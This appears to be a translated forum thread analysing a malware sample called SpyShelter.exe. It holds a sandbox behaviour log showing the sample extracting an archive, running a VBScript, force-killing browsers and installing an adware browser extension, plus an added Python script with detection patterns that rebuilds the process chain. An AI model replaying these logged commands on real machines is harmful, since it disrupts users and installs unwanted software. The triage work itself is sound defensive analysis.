[Malware Sample] SpyShelter.exe
白露为霜
Posted on 2015-12-22 23:18:55

liu浪的人
Posted on 2015-12-22 23:34:11
Avira miss
Cloud verdict: clean
Can't be bothered to submit it; usually when the cloud says clean, Avira will call it clean too...
心痛的伤不起
Posted on 2015-12-23 00:04:34
liu浪的人 posted on 2015-12-22 23:34:
Avira miss
Cloud verdict: clean
Can't be bothered to submit it; usually when the cloud says clean, Avira will call it clean too...

Not as good as the WD series.

kxmp
Posted on 2015-12-23 14:32:48
2015/12/23 14:29:30,E:\SpyShelter.exe,50,Allowed ;使用 DNS 解析服务访问网络
2015/12/23 14:29:30,C:\Program Files\Sandboxie\SandboxieDcomLaunch.exe,53,Allowed ;执行应用程序 (C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683})
2015/12/23 14:29:34,E:\SpyShelter.exe,48,Allowed ;出站网络访问
2015/12/23 14:29:42,E:\SpyShelter.exe,53,Allowed ;执行应用程序 (7za.exe x -ppassword -y 316314.zip)
2015/12/23 14:29:42,C:\Program Files\Sandboxie\SbieSvc.exe,53,Allowed ;执行应用程序 ("C:\Program Files\Sandboxie\SbieSvc.exe" Sandboxie_GuiProxy_Console,Sandboxie_ConsoleReadyEvent_003C0D1B)
2015/12/23 14:29:42,C:\Windows\System32\csrss.exe,53,Allowed ;执行应用程序 (\??\C:\Windows\system32\conhost.exe "478088254-1312189794-19950829741927673497459604238141156577236866780-728178424")
2015/12/23 14:29:42,C:\Windows\System32\conhost.exe,52,Allowed ;修改属于其它进程的窗口的属性 (SbieSvc.exe(pid=6000))
2015/12/23 14:29:55,C:\Program Files (x86)\McAfee\Common Framework\McScript_InUse.exe,53,Allowed ;执行应用程序 (C:\PROGRA~2\McAfee\COMMON~1\McScanCheck.exe "C:\ProgramData\McAfee\Common Framework\UpdateDir" "C:\ProgramData\McAfee\Common Framework\UpdateDir\x64" mscan64a.dll AVV "C:\Windows\TEMP\ScanCheck.txt")
2015/12/23 14:29:55,C:\Windows\System32\csrss.exe,53,Allowed ;执行应用程序 (\??\C:\Windows\system32\conhost.exe "-1651228072503049511956901589-827314883-1592666892-1942204641580109960-1272265202")
2015/12/23 14:30:04,C:\Program Files (x86)\McAfee\Common Framework\McScript_InUse.exe,53,Allowed ;执行应用程序 ("C:\Program Files (x86)\Common Files\McAfee\DATReputation\mcdatrep.exe" /timeout=60000 /script=mcnrdhck.lua /hcmode=postdatupdate /datver=8023.0000 /datupdatestatus=0 )
2015/12/23 14:30:04,C:\Program Files (x86)\McAfee\Common Framework\McScript_InUse.exe,53,Allowed ;执行应用程序 ("C:\Program Files (x86)\Common Files\McAfee\DATReputation\mcdatrep.exe" /periodicRunCount=0 /script=mcnrdhck.lua )
2015/12/23 14:30:05,C:\Program Files (x86)\McAfee\Common Framework\McScript_InUse.exe,53,Allowed ;执行应用程序 ( /FI "IMAGENAME eq explorer.exe" /FO CSV /NH)
2015/12/23 14:30:08,E:\SpyShelter.exe,53,Allowed ;执行应用程序 (C:\Windows\system32\CScript.exe "d:\temp\316314\hi.vbs" //e:vbscript //NOLOGO)
2015/12/23 14:30:08,C:\Program Files\Sandboxie\SbieSvc.exe,53,Allowed ;执行应用程序 ("C:\Program Files\Sandboxie\SbieSvc.exe" Sandboxie_GuiProxy_Console,Sandboxie_ConsoleReadyEvent_003C7252)
2015/12/23 14:30:08,C:\Windows\System32\csrss.exe,53,Allowed ;执行应用程序 (\??\C:\Windows\system32\conhost.exe "338143596575308313692873832-20016725961288836711-1509871889-9265704791250334948")
2015/12/23 14:30:08,C:\Windows\System32\conhost.exe,52,Allowed ;修改属于其它进程的窗口的属性 (SbieSvc.exe(pid=5444))
2015/12/23 14:30:11,C:\Windows\SysWOW64\cscript.exe,26,Allowed ;修改受保护的注册表键 (HKCU\Machine\Software\Classes\CLSID)
2015/12/23 14:30:11,C:\Program Files (x86)\McAfee\Common Framework\McScript_InUse.exe,53,Allowed ;执行应用程序 ( /FI "IMAGENAME eq explorer.exe" /FO CSV /NH)
2015/12/23 14:30:17,C:\Program Files (x86)\McAfee\Common Framework\McScript_InUse.exe,53,Allowed ;执行应用程序 ("C:\Program Files\Common Files\McAfee\SystemCore\EntVUtil.EXE" "C:\Program Files\Common Files\McAfee\SystemCore\vscan.bof" )
2015/12/23 14:30:21,E:\SpyShelter.exe,53,Allowed ;执行应用程序 (d:\temp\201979.exe -ui=0 -sid=GuppyGo -merchantcid=236709 -forcefire=0  -tid="{DA8CF80D-AAD4-419A-A7CE-7AAFEB80363F}" -skipifinstalled=0 -disablepost=1 -disableuninstallinfo=1 -cid="316314" -affid="192346" -sid="shZnpJNKtGfhB7kPxQm99CS0_vWc7mMVEwTlUWGdEsSzOh1)
2015/12/23 14:30:26,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\201979.exe,53,Allowed ;执行应用程序 ("d:\temp\is-MAQOO.tmp\201979.tmp" /SL5="$1C1286,263420,119296,D:\temp\201979.exe" -ui=0 -sid=GuppyGo -merchantcid=236709 -forcefire=0  -tid="{DA8CF80D-AAD4-419A-A7CE-7AAFEB80363F}" -skipifinstalled=0 -disablepost=1 -disableuninstallinfo=1 -cid="316314" -affid)
2015/12/23 14:30:29,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\is-MAQOO.tmp\201979.tmp,26,Allowed ;修改受保护的注册表键 (HKCU\Machine\Software\Classes\CLSID)
2015/12/23 14:30:33,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\is-MAQOO.tmp\201979.tmp,53,Allowed ;执行应用程序 ("C:\Windows\System32\taskkill.exe" /f /im chrome.exe)
2015/12/23 14:30:34,C:\Program Files\Sandboxie\SbieSvc.exe,53,Allowed ;执行应用程序 ("C:\Program Files\Sandboxie\SbieSvc.exe" Sandboxie_GuiProxy_Console,Sandboxie_ConsoleReadyEvent_003CD807)
2015/12/23 14:30:34,C:\Windows\System32\csrss.exe,53,Allowed ;执行应用程序 (\??\C:\Windows\system32\conhost.exe "444042443-1959583709-1379484316665692931065482523-1731961981865629460-1227741386")
2015/12/23 14:30:34,C:\Windows\System32\conhost.exe,52,Allowed ;修改属于其它进程的窗口的属性 (SbieSvc.exe(pid=5408))
2015/12/23 14:30:34,C:\Windows\SysWOW64\taskkill.exe,26,Allowed ;修改受保护的注册表键 (HKCU\Machine\Software\Classes\CLSID)
2015/12/23 14:30:40,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\is-MAQOO.tmp\201979.tmp,53,Allowed ;执行应用程序 ("C:\Windows\System32\taskkill.exe" /f /im firefox.exe)
2015/12/23 14:30:40,C:\Program Files\Sandboxie\SbieSvc.exe,53,Allowed ;执行应用程序 ("C:\Program Files\Sandboxie\SbieSvc.exe" Sandboxie_GuiProxy_Console,Sandboxie_ConsoleReadyEvent_003CF1ED)
2015/12/23 14:30:40,C:\Windows\System32\csrss.exe,53,Allowed ;执行应用程序 (\??\C:\Windows\system32\conhost.exe "-642239881677714680166125766946256904-288141842309934449780999977-218563253")
2015/12/23 14:30:40,C:\Windows\System32\conhost.exe,52,Allowed ;修改属于其它进程的窗口的属性 (SbieSvc.exe(pid=2504))
2015/12/23 14:30:43,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\is-MAQOO.tmp\201979.tmp,53,Allowed ;执行应用程序 ("C:\Windows\System32\taskkill.exe" /f /im iexplore.exe)
2015/12/23 14:30:43,C:\Program Files\Sandboxie\SbieSvc.exe,53,Allowed ;执行应用程序 ("C:\Program Files\Sandboxie\SbieSvc.exe" Sandboxie_GuiProxy_Console,Sandboxie_ConsoleReadyEvent_003CFD81)
2015/12/23 14:30:43,C:\Windows\System32\csrss.exe,53,Allowed ;执行应用程序 (\??\C:\Windows\system32\conhost.exe "1937658548-9847657581609600950-1377082578-6912319161335222925-306770007389317131")
2015/12/23 14:30:43,C:\Windows\System32\conhost.exe,52,Allowed ;修改属于其它进程的窗口的属性 (SbieSvc.exe(pid=5304))
2015/12/23 14:30:47,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\is-MAQOO.tmp\201979.tmp,53,Allowed ;执行应用程序 ("d:\temp\is-V7RHA.tmp\c10w.exe" -cid=316314 -affid=192346 -sid=GuppyGo -disablepost=1 -forcefire=0 -skipifinstalled=0 -delay=0 -ref=20202(c) -merchantcid=236709 -pubcid= -componentid=201979 -exename="compete.exe" -downloadurl="http://s.fastk.us/ConsumerInputS)
2015/12/23 14:30:47,C:\Program Files\Sandboxie\SbieSvc.exe,53,Allowed ;执行应用程序 ("C:\Program Files\Sandboxie\SbieSvc.exe" Sandboxie_GuiProxy_Console,Sandboxie_ConsoleReadyEvent_003D0C60)
2015/12/23 14:30:47,C:\Windows\System32\csrss.exe,53,Allowed ;执行应用程序 (\??\C:\Windows\system32\conhost.exe "-17159567811003494079-13687363811099869392-251108506-1032153075693381816-1950632299")
2015/12/23 14:30:47,C:\Windows\System32\conhost.exe,52,Allowed ;修改属于其它进程的窗口的属性 (SbieSvc.exe(pid=844))
2015/12/23 14:30:49,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\is-V7RHA.tmp\c10w.exe,53,Allowed ;执行应用程序 (C:\Windows\system32\CScript.exe d:\temp\hi.vbs //e:vbscript //NOLOGO)
2015/12/23 14:30:49,C:\Program Files\Sandboxie\SbieSvc.exe,53,Allowed ;执行应用程序 ("C:\Program Files\Sandboxie\SbieSvc.exe" Sandboxie_GuiProxy_Console,Sandboxie_ConsoleReadyEvent_003D149A)
2015/12/23 14:30:49,C:\Windows\System32\csrss.exe,53,Allowed ;执行应用程序 (\??\C:\Windows\system32\conhost.exe "8454142111894301452600982658940222046-14869701052040354115-107766463177772538")
2015/12/23 14:30:49,C:\Windows\System32\conhost.exe,52,Allowed ;修改属于其它进程的窗口的属性 (SbieSvc.exe(pid=5772))
2015/12/23 14:30:52,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\is-V7RHA.tmp\c10w.exe,50,Allowed ;使用 DNS 解析服务访问网络
2015/12/23 14:30:54,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\is-V7RHA.tmp\c10w.exe,48,Allowed ;出站网络访问
2015/12/23 14:31:06,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\is-V7RHA.tmp\c10w.exe,53,Allowed ;执行应用程序 (d:\temp\compete.exe /partnerUrl="http://a.gmtrack.com/pixel.track?CID=261507&AFID=192346&SID=GuppyGo&source=316314&MerchantReferenceID={DA8CF80D-AAD4-419A-A7CE-7AAFEB80363F}&single_version=121815105004&cpp_version=121815103844" /panelid=gladiolus000 /panelist)
2015/12/23 14:31:08,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\compete.exe,50,Allowed ;使用 DNS 解析服务访问网络
2015/12/23 14:31:08,C:\Program Files (x86)\McAfee\VirusScan Enterprise\VsTskMgr.exe,53,Allowed ;执行应用程序 ("C:\Program Files (x86)\McAfee\VirusScan Enterprise\x64\scan64.exe" /getengineversion64)
2015/12/23 14:31:09,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\compete.exe,48,Allowed ;出站网络访问
2015/12/23 14:31:10,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\compete.exe,53,Allowed ;执行应用程序 ("C:\Program Files\Sandboxie\SandboxieCrypto.exe")
2015/12/23 14:31:15,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\compete.exe,53,Allowed ;执行应用程序 ("d:\temp\nsu78CD.tmp")
2015/12/23 14:31:16,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\compete.exe,53,Allowed ;执行应用程序 ("d:\temp\nsk7C86.tmp" /install "bundlename=Consumer Input&appguid={C7B061F6-380E-4545-86E3-400E3156FD28}&appname=Consumer Input Firefox Extension&needsadmin=True&lang=en&appguid={1138A907-2253-45D6-99C1-843A0AC58730}&appname=Consumer Input Internet Explorer E)
2015/12/23 14:31:16,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\nsk7C86.tmp,53,Allowed ;执行应用程序 (d:\temp\GUM7D99.tmp\ConsumerInputUpdate.exe /install "bundlename=Consumer Input&appguid={C7B061F6-380E-4545-86E3-400E3156FD28}&appname=Consumer Input Firefox Extension&needsadmin=True&lang=en&appguid={1138A907-2253-45D6-99C1-843A0AC58730}&appname=Consumer Inp)
2015/12/23 14:31:19,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\GUM7D99.tmp\ConsumerInputUpdate.exe,57,Allowed ;正在以只读方式打开受保护的进程 (explorer.exe(pid=1812))
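The behaviour log above records each "execute application" event against the path of the process that issued it, but the spawned child only shows up later under its Sandboxie redirect path (C:\Sandbox\<user>\<box>\drive\D\... instead of d:\...), and no child PID is logged. To see the sample's actual process chain (SpyShelter.exe -> 7za.exe / CScript.exe / 201979.exe -> 201979.tmp -> taskkill.exe / c10w.exe -> compete.exe) the redirect has to be undone and parent and child matched by normalized path. The Python below is an added example for this thread, not code posted by kxmp or shipped with any tool mentioned here; the sample lines are excerpts from the log above with command lines shortened (marked as constructed in the code), the event-code meanings are read off the descriptions paired with them in that log rather than from vendor documentation, and the SUSPICIOUS patterns are the editor's own choice of what to flag.

```python
"""Rebuild a sample's execution chain from the behaviour log above.

Added example, not code from the thread. Assumed log format (as seen in the post):
    timestamp,process_path,event_code,verdict ;description (arguments)
Children are later logged under the Sandboxie redirect
C:\\Sandbox\\<user>\\<box>\\drive\\<letter>\\..., which normalize() undoes.
"""
import re
from collections import defaultdict, deque

# Event codes as paired with descriptions in the post's log (not vendor docs).
EVENT_NAMES = {26: "modify protected registry key", 48: "outbound network access",
               50: "DNS resolution", 52: "modify window of another process",
               53: "execute application", 57: "open protected process (read-only)"}

LINE_RE = re.compile(r"^(?P<ts>\S+ \S+),(?P<proc>.+?),(?P<code>\d+),(?P<verdict>\w+) ;(?P<desc>.*)$")
SANDBOX_RE = re.compile(r"^c:\\sandbox\\[^\\]+\\[^\\]+\\drive\\([a-z])\\", re.IGNORECASE)

# Editor-chosen behaviours worth flagging; patterns match the child's command line.
SUSPICIOUS = [
    (re.compile(r"7za?\.exe\b.*\s-p\S", re.I), "extracts a password-protected archive"),
    (re.compile(r"[cw]script\.exe\b.*\.vbs", re.I), "runs a VBScript via the script host"),
    (re.compile(r'taskkill\.exe"?\s+/f\s+/im\s+\S+', re.I), "force-kills another process"),
]

# Constructed sample: excerpts of the log above, command lines shortened.
LOG = r"""
2015/12/23 14:29:30,E:\SpyShelter.exe,50,Allowed ;使用 DNS 解析服务访问网络
2015/12/23 14:29:42,E:\SpyShelter.exe,53,Allowed ;执行应用程序 (7za.exe x -ppassword -y 316314.zip)
2015/12/23 14:29:55,C:\Program Files (x86)\McAfee\Common Framework\McScript_InUse.exe,53,Allowed ;执行应用程序 (C:\PROGRA~2\McAfee\COMMON~1\McScanCheck.exe)
2015/12/23 14:30:08,E:\SpyShelter.exe,53,Allowed ;执行应用程序 (C:\Windows\system32\CScript.exe "d:\temp\316314\hi.vbs" //e:vbscript //NOLOGO)
2015/12/23 14:30:21,E:\SpyShelter.exe,53,Allowed ;执行应用程序 (d:\temp\201979.exe -ui=0 -sid=GuppyGo)
2015/12/23 14:30:26,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\201979.exe,53,Allowed ;执行应用程序 ("d:\temp\is-MAQOO.tmp\201979.tmp" /SL5="$1C1286,263420,119296,D:\temp\201979.exe" -ui=0)
2015/12/23 14:30:33,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\is-MAQOO.tmp\201979.tmp,53,Allowed ;执行应用程序 ("C:\Windows\System32\taskkill.exe" /f /im chrome.exe)
2015/12/23 14:30:40,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\is-MAQOO.tmp\201979.tmp,53,Allowed ;执行应用程序 ("C:\Windows\System32\taskkill.exe" /f /im firefox.exe)
2015/12/23 14:30:47,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\is-MAQOO.tmp\201979.tmp,53,Allowed ;执行应用程序 ("d:\temp\is-V7RHA.tmp\c10w.exe" -cid=316314)
2015/12/23 14:30:54,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\is-V7RHA.tmp\c10w.exe,48,Allowed ;出站网络访问
2015/12/23 14:31:06,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\is-V7RHA.tmp\c10w.exe,53,Allowed ;执行应用程序 (d:\temp\compete.exe /panelid=gladiolus000)
"""


def normalize(path):
    """Lower-case, strip quotes and the NT \\??\\ prefix, undo the sandbox redirect."""
    path = path.strip().strip('"')
    if path.startswith("\\??\\"):
        path = path[4:]
    path = SANDBOX_RE.sub(lambda m: m.group(1).lower() + ":\\", path)
    return path.lower()


def split_command(desc):
    """(executable, command line) from an 'execute application (...)' description."""
    start = desc.find("(")
    if start < 0:
        return None, None
    cmd = desc[start + 1:].strip()
    if cmd.endswith(")"):
        cmd = cmd[:-1]
    if cmd.startswith('"'):  # quoted executable path
        end = cmd.find('"', 1)
        exe = cmd[1:end] if end > 0 else cmd[1:]
    else:
        exe = cmd.split(" ", 1)[0]
    return normalize(exe), cmd


def parse(log_text):
    """Turn log lines into event dicts; lines not in the expected format are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ev = {"ts": m["ts"], "proc": normalize(m["proc"]), "code": int(m["code"]),
              "verdict": m["verdict"], "exe": None, "cmd": None}
        if ev["code"] == 53:
            ev["exe"], ev["cmd"] = split_command(m["desc"])
        events.append(ev)
    return events


def execution_chain(events, root):
    """Breadth-first list of (parent, child_exe, command) reachable from `root`.

    Linkage is by normalized path because the log gives no PID for the child.
    """
    children = defaultdict(list)
    for ev in events:
        if ev["code"] == 53 and ev["exe"]:
            children[ev["proc"]].append((ev["exe"], ev["cmd"]))
    root = normalize(root)
    chain, seen, queue = [], {root}, deque([root])
    while queue:
        parent = queue.popleft()
        for exe, cmd in children.get(parent, []):
            chain.append((parent, exe, cmd))
            if exe not in seen:
                seen.add(exe)
                queue.append(exe)
    return chain


def flag_behaviours(chain):
    """One finding per chain step whose command line matches a SUSPICIOUS pattern."""
    return [f"{parent} -> {exe}: {meaning}"
            for parent, exe, cmd in chain for pattern, meaning in SUSPICIOUS
            if pattern.search(cmd)]


def network_events(events, chain, root):
    """(process, event name) for DNS/outbound events raised by the sample or its descendants."""
    members = {normalize(root)} | {exe for _, exe, _ in chain}
    return [(ev["proc"], EVENT_NAMES[ev["code"]]) for ev in events
            if ev["code"] in (48, 50) and ev["proc"] in members]


if __name__ == "__main__":
    evs = parse(LOG)
    chain = execution_chain(evs, r"E:\SpyShelter.exe")
    for parent, exe, cmd in chain:
        print(f"{parent}\n    -> {cmd}")
    for finding in flag_behaviours(chain):
        print("FLAG:", finding)
    for proc, name in network_events(evs, chain, r"E:\SpyShelter.exe"):
        print("NET :", proc, name)
```

Run against the full log in the post, the same code separates the sample's own activity from the unrelated McAfee and Sandboxie helper processes that are interleaved with it, which is the first thing a triage analyst needs before judging whether the cloud "clean" verdict quoted earlier in the thread is credible.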
KaFan Forum (卡饭论坛) | KaFan.cn